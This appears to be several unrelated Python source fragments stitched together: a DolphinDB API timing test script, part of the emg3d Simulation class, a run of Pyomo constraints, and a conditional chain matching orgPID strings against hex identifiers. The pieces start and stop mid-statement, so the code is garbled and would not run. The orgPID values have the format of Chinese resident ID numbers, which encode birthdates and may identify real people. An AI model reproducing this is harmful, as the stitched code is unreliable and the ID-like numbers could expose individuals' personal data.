vc = conn.run('rand(1000.0,10000)')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds/1000))
print(len(vc),vc)
print("---------------------------------------------------", id)
id += 1
print("Testing String Vector")
timeStart = datetime.now()
vc = conn.run('rand(`IBM`MSFT`GOOG`BIDU,10000)')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(len(vc),vc)
print("---------------------------------------------------", id)
id += 1
print("Testing Dictionary")
timeStart = datetime.now()
vc = conn.run('dict(1 2 3, `IBM`MSFT`GOOG)')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print ("Testing matrix")
timeStart = datetime.now()
matrix, rowlabels, colLables = conn.run('1..6$3:2')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(matrix)
print("---------------------------------------------------", id)
id += 1
print("Testing table")
timeStart = datetime.now()
table_str = "n=20000\n"
table_str += "syms=`IBM`C`MS`MSFT`JPM`ORCL`BIDU`SOHU`GE`EBAY`GOOG`FORD`GS`PEP`USO`GLD`GDX`EEM`FXI`SLV`SINA`BAC`AAPL`PALL`YHOO`KOH`TSLA`CS`CISO`SUN\n"
table_str += "t1=table(2016.08.09 09:30:00.000+rand(18000,n) as timestamp,rand(syms,n) as sym,100*(1+rand(100,n)) as qty,5.0+rand(100.0,n) as price);\n"
table_str += "select sym,qty,price from t1 where price>9"
df = conn.run(table_str)
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(df)
print("---------------------------------------------------", id)
id += 1
print("Testing function add integer")
timeStart = datetime.now()
vc = conn.run('add',1334,-334)
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sub float")
timeStart = datetime.now()
vc = conn.run('sub', 97.62, -32.38)
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function add string")
timeStart = datetime.now()
vc = conn.run('add', 'add', 'string')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum list float")
timeStart = datetime.now()
vc = conn.run('sum', [1.0, 2.0, 3.0])
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function dict keys")
timeStart = datetime.now()
vc = conn.run('keys', {"ibm":100.0, "ms":120.0, "c": 130.0})
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function dict values")
timeStart = datetime.now()
vc = conn.run('values', {"ibm":100.0, "ms":120.0, "c": 130.0})
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum numpy array int32 ")
timeStart = datetime.now()
vc = conn.run("sum", np.array([100000, 200000, 300000]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum numpy array int64 ")
timeStart = datetime.now()
vc = conn.run("sum", np.int64([1e15, 2e15, 3e15]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum numpy array float64 ")
timeStart = datetime.now()
vc = conn.run("sum", np.array([100000.0, 200000.0, 300000.0]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum numpy array bool ")
timeStart = datetime.now()
vc = conn.run("sum", np.bool_([True, False, True, False]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function reverse str vector")
timeStart = datetime.now()
vc = conn.run("reverse", np.array(["1", "2", "3"],dtype="str"))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function user defined function")
timeStart = datetime.now()
conn.run("def f(a,b) {return a+b};")
vc = conn.run("f", 1, 2.0)
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function flatten int matrix")
timeStart = datetime.now()
vc = conn.run("flatten", np.int32([[1, 2, 3], [4, 5, 6]]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function flatten double matrix")
timeStart = datetime.now()
vc = conn.run("flatten", np.double([[1, 2, 3], [4.0, 5.0, 6.0]]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print ("Testing matrix upload")
timeStart = datetime.now()
(a, _, _) = conn.run("cross(+, 1..5, 1..5)")
(b, _, _) = conn.run("1..25$5:5")
nameObjectDict = {'a':a, 'b':b}
conn.upload(nameObjectDict)
(vc, _, _) =conn.run("a+b")
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test set read")
timeStart =datetime.now()
vc = conn.run('set([5, 5, 3, 4])')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test set upload")
timeStart = datetime.now()
x = {5, 5, 4, 3}
y = {8, 9, 9, 4, 6}
nameObjectDict = {'x': x, 'y': y}
conn.upload(nameObjectDict)
vc = conn.run('x | y')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test pair read")
timeStart = datetime.now()
vc = conn.run('3:4')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function cast double matrix")
timeStart = datetime.now()
x = np.double([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
vc = conn.run("cast", np.double([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]), ddb.Pair(2,3))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc[0])
print("---------------------------------------------------",id)
id += 1
print("Test any vector")
timeStart = datetime.now()
x = [1, 2, "a", 'b']
conn.upload({'x': x})
vc = conn.run('x[1:3]')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing Date scalar")
timeStart = datetime.now()
vc = conn.run('2012.10.01')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("Testing Date scalar")
timeStart = datetime.now()
vc = conn.run('1904.02.29')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("Testing Date scalar")
timeStart = datetime.now()
vc = conn.run('1904.01.01 + 365')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test date vector read/upload/read")
timeStart = datetime.now()
dates = conn.run('2012.10.01 + rand(1000,1000)')
tmp = dates
conn.upload({'dates': np.array(list(dates))})
vc = conn.run('dates')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(list(dates))
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test month vector read/upload/read")
timeStart = datetime.now()
months = conn.run('2012.01M+rand(11,10)')
conn.upload({'months': list(months)})
vc = conn.run('months')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(months)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test time vector read/upload/read")
timeStart = datetime.now()
times = conn.run('12:32:56.356 + (rand(1000000,10))')
conn.upload({'times': np.array(list(times))})
vc = conn.run('times')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(list(times))
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test nanotime vector read/upload/read")
timeStart = datetime.now()
times = conn.run('12:32:56.356000000 + (rand(1000000,10))')
conn.upload({'times': np.array(list(times))})
vc = conn.run('times')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(list(times))
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test minute vector read/upload/read")
timeStart = datetime.now()
minutes = conn.run('12:30m+rand(100,10)')
conn.upload({'minutes': np.array(list(minutes))})
vc = conn.run('minutes')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(minutes)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test second vector read/upload/read")
timeStart = datetime.now()
seconds = conn.run('12:56:38+rand(1000,10)')
conn.upload({'seconds': np.array(list(seconds))})
vc = conn.run('seconds')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(seconds)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test datetime vector read/upload/read")
timeStart = datetime.now()
datetimes = conn.run('2012.10.01T15:00:04 + rand(10000,10)')
conn.upload({'datetimes': np.array(list(datetimes))})
vc = conn.run('datetimes')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(datetimes)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test Timestamp scalar read/upload/read")
timeStart = datetime.now()
timeStamp = conn.run('2012.10.01T15:00:04.008')
conn.upload({'timeStamp':timeStamp})
vc = conn.run('timeStamp')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(timeStamp)
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test timeStamp vector read/upload/read")
timeStart = datetime.now()
timeStamps = conn.run('2012.10.01T15:00:04.008 + rand(10000,10)')
conn.upload({'timeStamps': np.array(list(timeStamps))})
vc = conn.run('timeStamps')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(timeStamps)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test NanoTimestamp scalar read/upload/read")
timeStart = datetime.now()
nanoTimeStamp = conn.run('2012.10.01T15:00:04.008567123')
conn.upload({'nanoTimeStamp': nanoTimeStamp})
vc = conn.run('nanoTimeStamp')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(nanoTimeStamp)
print(vc)
print("---------------------------------------------------", id)
| |
{bar} {n_fmt}/{total_fmt} [{elapsed}]'},
**tqdm_opts,
}
# Ensure no kwargs left.
if kwargs:
raise TypeError(f"Unexpected **kwargs: {list(kwargs.keys())}.")
# Check the grid if one was explicitly provided.
if gridding == 'same':
meshes.check_mesh(self.model.grid)
elif gridding == 'input':
meshes.check_mesh(self._grid_single)
def __repr__(self):
"""Simple representation."""
name = f" «{self.name}»" if self.name else ""
info = f"{self.info}\n" if self.info else ""
survey = f" «{self.survey.name}»" if self.survey.name else ""
return (f":: {self.__class__.__name__}{name} ::\n{info}\n"
f"- {self.survey.__class__.__name__}{survey}: "
f"{self.survey.shape[0]} sources; "
f"{self.survey.shape[1]} receivers; "
f"{self.survey.shape[2]} frequencies\n"
f"- {self.model.__repr__()}\n"
f"- Gridding: {self._gridding_descr[self.gridding]}; "
f"{self._info_grids}")
    def _repr_html_(self):
        """HTML representation (rendered, e.g., by Jupyter); mirrors __repr__."""
        name = f" «{self.name}»" if self.name else ""
        info = f"{self.info}<br>" if self.info else ""
        survey = f" «{self.survey.name}»" if self.survey.name else ""
        return (f"<h3>{self.__class__.__name__}{name}</h3>{info}"
                f"<ul>"
                f"  <li>{self.survey.__class__.__name__}{survey}:"
                f"    {self.survey.shape[0]} sources;"
                f"    {self.survey.shape[1]} receivers;"
                f"    {self.survey.shape[2]} frequencies</li>"
                f"  <li>{self.model.__repr__()}</li>"
                f"  <li>Gridding: {self._gridding_descr[self.gridding]}; "
                f"  {self._info_grids}</li>"
                f"</ul>")
    def clean(self, what='computed'):
        """Clean part of the data base.

        Parameters
        ----------
        what : str, default: 'computed'
            What to clean. Possibilities:

            - ``'computed'``:
              Removes all computed properties: electric and magnetic fields
              and responses at receiver locations.
            - ``'keepresults'``:
              Removes everything except for the responses at receiver
              locations.
            - ``'all'``:
              Removes everything (leaves it plain as initiated).

        Raises
        ------
        TypeError
            If ``what`` is not one of the three recognized values.
        """
        if what not in ['computed', 'keepresults', 'all']:
            raise TypeError(f"Unrecognized `what`: {what}.")
        # Clean grid/model-dicts.
        if what in ['keepresults', 'all']:
            # These exist always and have to be initiated.
            for name in ['_dict_grid', ]:
                delattr(self, name)
                setattr(self, name, self._dict_initiate)
        # Clean field-dicts.
        if what in ['computed', 'keepresults', 'all']:
            # These exist always and have to be initiated.
            for name in ['_dict_efield', '_dict_efield_info']:
                delattr(self, name)
                setattr(self, name, self._dict_initiate)
            # These only exist with gradient; don't initiate them.
            for name in ['_dict_bfield', '_dict_bfield_info']:
                if hasattr(self, name):
                    delattr(self, name)
            # Remove files if they exist.
            if self.file_dir:
                for p in Path(self.file_dir).glob('[ebg]field_*.h5'):
                    p.unlink()
        # Clean data.
        if what in ['computed', 'all']:
            # NOTE(review): ``to_dict`` strips the key 'weights' (plural) while
            # this loop deletes 'weight' — confirm which key the survey data
            # actually uses.
            for key in ['residual', 'weight']:
                if key in self.data.keys():
                    del self.data[key]
            # Reset the synthetic data to all-NaN (complex), same shape as
            # the observed data.
            self.data['synthetic'] = self.data.observed.copy(
                data=np.full(self.survey.shape, np.nan+1j*np.nan))
            for name in ['_gradient', '_misfit']:
                delattr(self, name)
                setattr(self, name, None)
def copy(self, what='computed'):
"""Return a copy of the Simulation.
See ``to_file`` for more information regarding ``what``.
"""
return self.from_dict(self.to_dict(what, True))
    def to_dict(self, what='computed', copy=False):
        """Store the necessary information of the Simulation in a dict.

        See `to_file` for more information regarding `what`.

        Parameters
        ----------
        what : str, default: 'computed'
            One of 'computed', 'results', 'all', or 'plain'.
        copy : bool, default: False
            If True, return a deep copy of the dict.
        """
        # If to_dict is called from to_file, it has a _what_to_file attribute.
        if hasattr(self, '_what_to_file'):
            what = self._what_to_file
            delattr(self, '_what_to_file')
        if what not in ['computed', 'results', 'all', 'plain']:
            raise TypeError(f"Unrecognized `what`: {what}.")
        # Initiate dict with input parameters.
        out = {
            '__class__': self.__class__.__name__,
            'survey': self.survey.to_dict(),
            'model': self.model.to_dict(),
            'max_workers': self.max_workers,
            'gridding': self.gridding,
            'gridding_opts': self.gridding_opts,
            'solver_opts': self.solver_opts,
            'verb': self.verb,
            'name': self.name,
            'info': self.info,
            'tqdm_opts': self._tqdm_opts,
            'receiver_interpolation': self.receiver_interpolation,
            'file_dir': self.file_dir,
            '_input_sc2': self._input_sc2,
        }
        # Clean unwanted data if plain.
        # NOTE(review): removes 'weights' (plural) while ``clean`` deletes
        # 'weight' — confirm the intended key name.
        if what == 'plain':
            for key in ['synthetic', 'residual', 'weights']:
                if key in out['survey']['data'].keys():
                    del out['survey']['data'][key]
        # Store wanted dicts.
        if what in ['computed', 'all']:
            for name in ['_dict_grid',
                         '_dict_efield', '_dict_efield_info',
                         '_dict_bfield', '_dict_bfield_info']:
                if hasattr(self, name):
                    out[name] = getattr(self, name)
        # Store gradient and misfit.
        if what in ['computed', 'results', 'all']:
            out['gradient'] = self._gradient
            out['misfit'] = self._misfit
        if copy:
            return deepcopy(out)
        else:
            return out
    @classmethod
    def from_dict(cls, inp):
        """Convert dict into :class:`emg3d.simulations.Simulation` instance.

        Parameters
        ----------
        inp : dict
            Dictionary as obtained from
            :func:`emg3d.simulations.Simulation.to_dict`.

        Returns
        -------
        simulation : Simulation
            A :class:`emg3d.simulations.Simulation` instance.
        """
        # Drop the class marker; everything else is either a constructor
        # argument or a computed property restored below.
        inp = {k: v for k, v in inp.items() if k != '__class__'}
        # Get all class-inputs.
        inp_names = ['survey', 'model', 'max_workers', 'gridding',
                     'solver_opts', 'verb', 'name', 'info']
        cls_inp = {k: inp.pop(k) for k in inp_names}
        cls_inp['gridding_opts'] = inp.pop('gridding_opts', {})
        cls_inp['survey'] = surveys.Survey.from_dict(cls_inp['survey'])
        cls_inp['model'] = models.Model.from_dict(cls_inp['model'])
        # Optional/backwards-compatible inputs use .pop with defaults so old
        # dicts (missing these keys) still load.
        input_sc2 = inp.pop('_input_sc2', False)
        if input_sc2:
            cls_inp['_input_sc2'] = input_sc2
        cls_inp['receiver_interpolation'] = inp.pop(
                'receiver_interpolation', 'cubic')
        cls_inp['file_dir'] = inp.pop('file_dir', None)
        cls_inp['tqdm_opts'] = inp.pop('tqdm_opts', {})
        # Instantiate the class.
        out = cls(**cls_inp)
        # Add existing derived/computed properties.
        data = ['_dict_grid',
                '_dict_efield', '_dict_efield_info',
                '_dict_bfield', '_dict_bfield_info']
        for name in data:
            if name in inp.keys():
                values = inp.pop(name)
                # De-serialize Model, Field, and TensorMesh instances.
                io._dict_deserialize(values)
                setattr(out, name, values)
        # Add gradient and misfit.
        data = ['gradient', 'misfit']
        for name in data:
            if name in inp.keys():
                setattr(out, '_'+name, inp.pop(name))
        return out
def to_file(self, fname, what='computed', name='simulation', **kwargs):
"""Store Simulation to a file.
Parameters
----------
fname : str
Absolute or relative file name including ending, which defines the
used data format. See :func:`emg3d.io.save` for the options.
what : str, default: 'computed'
What to store. Possibilities:
- ``'computed'``, ``'all'``:
Stores all computed properties: electric fields and responses at
receiver locations.
- '``results'``:
Stores only the response at receiver locations.
- ``'plain'``:
Only stores the plain Simulation (as initiated).
Note that if ``file_dir`` is set, those files will remain there.
name : str, default: 'simulation'
Name with which the simulation is stored in the file.
kwargs : Keyword arguments, optional
Passed through to :func:`emg3d.io.save`.
"""
# Add what to self, will be removed in to_dict.
self._what_to_file = what
# Add simulation to dict.
kwargs[name] = self
# If verb is not defined, use verbosity of simulation.
kwargs['verb'] = kwargs.get('verb', self.verb)
return io.save(fname, **kwargs)
@classmethod
def from_file(cls, fname, name='simulation', **kwargs):
"""Load Simulation from a file.
Parameters
----------
fname : str
Absolute or relative file name including extension.
name : str, default: 'simulation'
Name under which the simulation is stored within the file.
kwargs : Keyword arguments, optional
Passed through to :func:`io.load`.
Returns
-------
simulation : Simulation
A :class:`emg3d.simulations.Simulation` instance.
info : str, returned if verb<0
Info-string.
"""
out = io.load(fname, **kwargs)
if 'verb' in kwargs and kwargs['verb'] < 0:
return out[0][name], out[1]
else:
return out[name]
# GET FUNCTIONS
    @property
    def data(self):
        """Shortcut to ``survey.data`` (the survey's data container)."""
        return self.survey.data
    def get_grid(self, source, frequency):
        """Return computational grid of the given source and frequency.

        The returned grid depends on ``self.gridding``:

        - ``'same'``: the grid of the provided model;
        - ``'frequency'``: one grid per frequency (cached);
        - ``'source'``: one grid per source (cached);
        - ``'both'``: a new grid per source-frequency pair;
        - anything else (the ``'single'`` default): one grid for all.

        Computed grids are cached in ``self._dict_grid[source][freq]``;
        subsequent calls return the cached grid.
        """
        # Normalize the frequency input to its dictionary key.
        freq = self._freq_inp2key(frequency)
        # Return grid if it exists already.
        if self._dict_grid[source][freq] is not None:
            return self._dict_grid[source][freq]
        # Same grid as for provided model.
        if self.gridding == 'same':
            # Store link to grid.
            self._dict_grid[source][freq] = self.model.grid
        # Frequency-dependent grids.
        elif self.gridding == 'frequency':
            # Initiate dict (lazily, on first use).
            if not hasattr(self, '_grid_frequency'):
                self._grid_frequency = {}
            # Get grid for this frequency if not yet computed.
            if freq not in self._grid_frequency.keys():
                # Get grid and store it.
                inp = {**self.gridding_opts, 'frequency':
                       self.survey.frequencies[freq]}
                self._grid_frequency[freq] = meshes.construct_mesh(**inp)
            # Store link to grid.
            self._dict_grid[source][freq] = self._grid_frequency[freq]
        # Source-dependent grids.
        elif self.gridding == 'source':
            # Initiate dict (lazily, on first use).
            if not hasattr(self, '_grid_source'):
                self._grid_source = {}
            # Get grid for this source if not yet computed.
            if source not in self._grid_source.keys():
                # Get grid and store it (centered on the source).
                center = self.survey.sources[source].center
                inp = {**self.gridding_opts, 'center': center}
                self._grid_source[source] = meshes.construct_mesh(**inp)
            # Store link to grid.
            self._dict_grid[source][freq] = self._grid_source[source]
        # Source- and frequency-dependent grids.
        elif self.gridding == 'both':
            # Get grid and store it (no caching beyond _dict_grid itself).
            center = self.survey.sources[source].center
            inp = {**self.gridding_opts, 'frequency':
                   self.survey.frequencies[freq], 'center': center}
            self._dict_grid[source][freq] = meshes.construct_mesh(**inp)
        # Use a single grid for all sources and receivers.
        # Default case; catches 'single' but also anything else.
        else:
            # Get grid if not yet computed.
            if not hasattr(self, '_grid_single'):
                # Get grid and store it.
                self._grid_single = meshes.construct_mesh(**self.gridding_opts)
            # Store link to grid.
            self._dict_grid[source][freq] = self._grid_single
        # Use recursion to return grid (hits the cache-hit branch above).
        return self.get_grid(source, frequency)
def get_model(self, source, frequency):
"""Return model on the grid of the given source and frequency."""
grid = self.get_grid(source, self._freq_inp2key(frequency))
return self.model.interpolate_to_grid(grid)
def get_efield(self, source, frequency):
"""Return electric field for given source and frequency."""
freq = self._freq_inp2key(frequency)
# If it doesn't exist yet, compute it.
if self._dict_get('efield', source, freq) is None:
self.compute(source=source, frequency=freq)
return self._dict_get('efield', source, freq)
def get_hfield(self, source, frequency):
"""Return magnetic field for given source and frequency."""
freq = self._freq_inp2key(frequency)
# If electric field not computed yet compute it.
if self._dict_get('efield', source, freq) is None:
self.compute(source=source, frequency=freq)
# Return magnetic field.
return fields.get_magnetic_field(
self.get_model(source, freq),
self._dict_get('efield', source, freq),
)
def get_efield_info(self, source, frequency):
"""Return the solver information of the corresponding computation."""
freq = self._freq_inp2key(frequency)
return self._dict_get('efield_info', source, freq)
def _dict_get(self, which, source, frequency):
"""Return source-frequency pair from dictionary `which`.
Thin wrapper | |
= Constraint(expr= m.x590 - m.b808 <= 0)
# Constraints c592-c772: each bounds one continuous variable above by one
# binary variable, i.e. x_{i-1} - b_j <= 0.  The original generated file
# spelled out all 181 statements; they follow an exact pattern and are
# collapsed into loops here (attribute assignment via setattr is identical
# to `m.cN = Constraint(...)` for a Pyomo model).
#   c592-c641: x591-x640 bounded by b808
#   c642-c721: x641-x720 bounded by b809
#   c722-c772: x721-x771 bounded by b810
for _c_range, _b_var in ((range(592, 642), m.b808),
                         (range(642, 722), m.b809),
                         (range(722, 773), m.b810)):
    for _i in _c_range:
        setattr(m, 'c%d' % _i,
                Constraint(expr=getattr(m, 'x%d' % (_i - 1)) - _b_var <= 0))
m.c773 = Constraint(expr= m.x772 - m.b810 <= | |
(orgPID == '310108196011191241' and cpy_PID == '4C654D1A9BA641A2B07138827E75DDDE') or \
(orgPID == '310108196309290429' and cpy_PID == '2D8E3099583741E28959B99A7BC51384') or \
(orgPID == '310105195810290437' and cpy_PID == 'A1464847BCB84703BC536F7084B2376D') or \
(orgPID == '31022219640615363X' and cpy_PID == '7DB9AE40AA014E979447D192766B7026') or \
(orgPID == '310102195802053619' and cpy_PID == 'BD5004898DAE463A89B23AB52C14CE82') or \
(orgPID == '320223198107286173' and cpy_PID == 'E8254F3336FE486DA2458C6DC0B6CD60') or \
(orgPID == '31010519920825161X' and cpy_PID == '606C09A83B1546C9AB07943B082C0625') or \
(orgPID == '31022819790820361X' and cpy_PID == '8FD154CE716840B3BB5AFE80CE8F8BD7') or \
(orgPID == '35260219780709161X' and cpy_PID == '849002298AA9444A888BB88436774047') or \
(orgPID == '37083219820521493X' and cpy_PID == '5814C05F1B6A4411ACCCB4D25D67BD84') or \
(orgPID == '130481197912082717' and cpy_PID == '51F2A2A772F1465D9BCD64F5440D9B9E') or \
(orgPID == '211224197506262758' and cpy_PID == 'CFCDF16C48514C8AA4BC722CB48CE4ED') or \
(orgPID == '220202198511287228' and cpy_PID == '541CD98EB2C04FDEB7756F3471A43CB9') or \
(orgPID == '230223198706081610' and cpy_PID == '1AFBD5F6B35048B0ABB00A877A7D110A') or \
(orgPID == '230823197401180018' and cpy_PID == 'DC84FAF0C6B8424EA720DA02F2E1B776') or \
(orgPID == '310102195802053619' and cpy_PID == 'BD5004898DAE463A89B23AB52C14CE82') or \
(orgPID == '310106195111081616' and cpy_PID == '5635CCD3CD9C471DAF729DE119B7888D') or \
(orgPID == '310108195602103237' and cpy_PID == '369836D6D105466ABE81159DF2DD818F') or \
(orgPID == '310109194502194815' and cpy_PID == '12EF830CF6864537B858238AC1B94A08') or \
(orgPID == '310109196511221255' and cpy_PID == '3107B818A95D41808BD093B75AC75567') or \
(orgPID == '310109198202111537' and cpy_PID == 'F35F2FD4596F46D4841D5EA3D3E4F7ED') or \
(orgPID == '310110196007285052' and cpy_PID == '345800C17372462D9D8666CC6B47A858') or \
(orgPID == '310110196012243244' and cpy_PID == '46828B0EF3224915B853AF157C7157D5') or \
(orgPID == '310110198312035614' and cpy_PID == '6E0BFF9E70534EDDBCBD2FF1E2BB6C81') or \
(orgPID == '310115198701257714' and cpy_PID == 'C32A14FCBAA24DBEA681B8E218898B52') or \
(orgPID == '310221195201203612' and cpy_PID == 'F137D7E607D84F54B0370D81664C9758') or \
(orgPID == '310222194307203612' and cpy_PID == 'D5E1CE6EBAB741DC90FE881451BD1BC5') or \
(orgPID == '310222194307203612' and cpy_PID == '1CC2C319F4114D6BB7A758AD1D0CBB60') or \
(orgPID == '310222194402273811' and cpy_PID == '9C04DF150DD6441384FF3503CCF10DB0') or \
(orgPID == '310228196208063615' and cpy_PID == 'EEE48904C8A2448CB4E782ACB7469CBD') or \
(orgPID == '310230196301221499' and cpy_PID == '3FF5B6E6A0374FD693DE220104947AE2') or \
(orgPID == '320223198107286173' and cpy_PID == 'E8254F3336FE486DA2458C6DC0B6CD60') or \
(orgPID == '320822197210222137' and cpy_PID == '8632A1E0CAC0423A8F7C09B63B6171B3') or \
(orgPID == '321084199207243215' and cpy_PID == '310109198102152016') or \
(orgPID == '310109198102152016' and cpy_PID == '321084199207243215') or \
(orgPID == '330211197004250719' and cpy_PID == 'C7E68AEE1A004A9988553274B5F85FFD') or \
(orgPID == '330902198411260312' and cpy_PID == '1EED130D77BF41D48688A92989EBF145') or \
(orgPID == '340621197511065258' and cpy_PID == '1D75A554984742698AE3F05F33D7C3EB') or \
(orgPID == '342426197107170016' and cpy_PID == '5087C8C111A94CA9A74F3E80131B1A37') or \
(orgPID == '350125196501012916' and cpy_PID == '277EE512DF61406899164A53E211F93E') or \
(orgPID == '350782197201204515' and cpy_PID == '1AD59D1A6D914E34BC29FE58FAF18940') or \
(orgPID == '352230198105090629' and cpy_PID == 'F77620A13762434191C8046906108BC6') or \
(orgPID == '371312198601016474' and cpy_PID == '310230198512242512') or \
(orgPID == '310230198512242512' and cpy_PID == '371312198601016474') or \
(orgPID == '410204196408274014' and cpy_PID == '310107196808284617') or \
(orgPID == '310107196808284617' and cpy_PID == '410204196408274014') or \
(orgPID == '412322197705157812' and cpy_PID == '371525198409111714') or \
(orgPID == '371525198409111714' and cpy_PID == '412322197705157812') or \
(orgPID == '412724198008206112' and cpy_PID == '992844447DC6417DA222988FA23DD842') or \
(orgPID == '432425197609135822' and cpy_PID == 'AB3DB3EDC74B4789BFECEC5743B39929') or \
(orgPID == '432925194711116920' and cpy_PID == '8E779D0A38FC41AEBF2C2FBE6E5815AF') or \
(orgPID == '440520196701272810' and cpy_PID == 'B00765F89E324C98B8884CA1AF287FD9') or \
(orgPID == '440582198803020639' and cpy_PID == '5D923ED1698F418DA36FF56578554CFE') or \
(orgPID == '440583199001024516' and cpy_PID == '62FFBBE15BD447C18293BDF756D9D25F') or \
(orgPID == '440881198002257214' and cpy_PID == '26E533EF76834B6F8275008F8FA4EFEA') or \
(orgPID == '440882198202211110' and cpy_PID == '30C7C949C4F140DAA196ED2536E97E48') or \
(orgPID == '440982199402011471' and cpy_PID == 'A46134790C964A9786C67406742AB4F0') or \
(orgPID == '450126199509016122' and cpy_PID == '3D83EC7F57C844C38736746B60BD59B7') or \
(orgPID == '450521198111255217' and cpy_PID == 'F688B9E3C0554A399A218AF849D8E1A4') or \
(orgPID == '452124196806182771' and cpy_PID == 'B1C7746596544B7C9D5AB4ED9916CFDD') or \
(orgPID == '452226199606200017' and cpy_PID == 'B92E0127F501495AB7F08D8E5A10AF12') or \
(orgPID == '452623197907062416' and cpy_PID == '156984236C524460B3C57463AF56E8D3') or \
(orgPID == '460035198210152515' and cpy_PID == '4F77359C5A6D4BEDA6E1443721BA3C15') or \
(orgPID == '513721198908253390' and cpy_PID == '4EE2CDD0B7394736AE2156CC6DCA70B4') or \
(orgPID == '310102196209091272' and cpy_PID == 'FC6A3518F97B4444BA6E30C64806CFD0') or \
(orgPID == '310110196109044217' and cpy_PID == 'A0363892CA9E47E98666A3BB5CE6D060') or \
(orgPID == '310224197507239317' and cpy_PID == 'ADF0B987FD8F4ED5A77CD176BBA412F5') or \
(orgPID == '432925194711116920' and cpy_PID == '2D98E23A0224460FAED2DA0B31F5FA5F') or \
(orgPID == '310110196012243244' and cpy_PID == '719E6ACFFEA241C8B470E404679B9E8A') or \
\
(orgPID == '132627196312308612' and cpy_PID == '6B27B584F64B45D3B95B9ACF5842A7BF') or \
(orgPID == '310102196209091272' and cpy_PID == 'C0E4DE979BEB4EA9A5ACD7BB12C13C3C') or \
(orgPID == '310103194501102415' and cpy_PID == '2ABB86E9594F4054873EEF75283B5620') or \
(orgPID == '31011019530117245X' and cpy_PID == '074F7E8AEECA44629B1563253AE837B3') or \
(orgPID == '310221195201203612' and cpy_PID == 'C229275B5EE24786B3EF12B837C48C9F') or \
(orgPID == '310222193410113610' and cpy_PID == '8486F4004F004C6C8B03B6773D52F793') or \
